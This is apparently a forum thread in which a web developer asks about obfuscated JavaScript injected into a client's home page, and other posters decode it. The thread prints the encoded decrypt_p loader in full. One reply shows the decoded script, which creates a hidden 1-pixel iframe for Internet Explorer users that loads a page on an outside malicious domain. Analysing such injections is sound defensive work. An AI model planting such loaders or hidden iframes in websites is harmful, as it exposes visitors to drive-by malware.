Unknown javascript appeared in a clients home page

It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared.

ke*********@gmail.com wrote:

Hello,
I'm hoping someone might help us understand the code listed below.

One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.

The following code appears this week on their site:
<script language=JavaScript>function decrypt_p(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,25, 32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46, 52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34, 56,37,57,21,39,0,0,0,0,3,0,2,30,61,14,31,1,62,19,7 ,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53);f or(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8 ;s-=2}else{s=6}}document.write(r)}}decrypt_p("rvBcveR szie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4 rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3 LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7o SO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_w QavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@p iJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9 @Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3Pi yKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>

Has anyone seen this before? I did a quick search and it mentioned
somehting about it being and encryption technique.

Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.

Could the hosting company be compromized?

Any information or insight is much appreciated.

Cheers,
Ken

drclue wrote:

It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared.

The code was inserted into the body of the page, directly after the
<bodytag.
The page does not appear to have any text, other than what the client
has supplied, appearing on the page after it appears in the browser.

ke*********@gmail.com wrote:
decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic 786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49 VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1 GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

the decrypt function decodes this into the following javascript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>

As you can see, the spyware targets only microsoft internet explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at

http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php

Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

---------------------------------------------------------------------------
http://www.hunlock.com -- Permanently under construction (And proud of it!)
$FA

pcx99 wrote:

>
The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

Wow, thank you.
Could I assume that this spyware is on the hosts server?

We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.

Many thanks for the insight.

Cheers,
Ken

More about it here:
http://www.aboutus.org/Wsfgfdgrtyhgfd.net

On Nov 25, 6:42 pm, "Mr. Ken" <ken.robe...@gmail.comwrote:

pcx99 wrote:

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.Wow, thank you.

Could I assume that this spyware is on the hosts server?

We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.

Many thanks for the insight.

Cheers,
Ken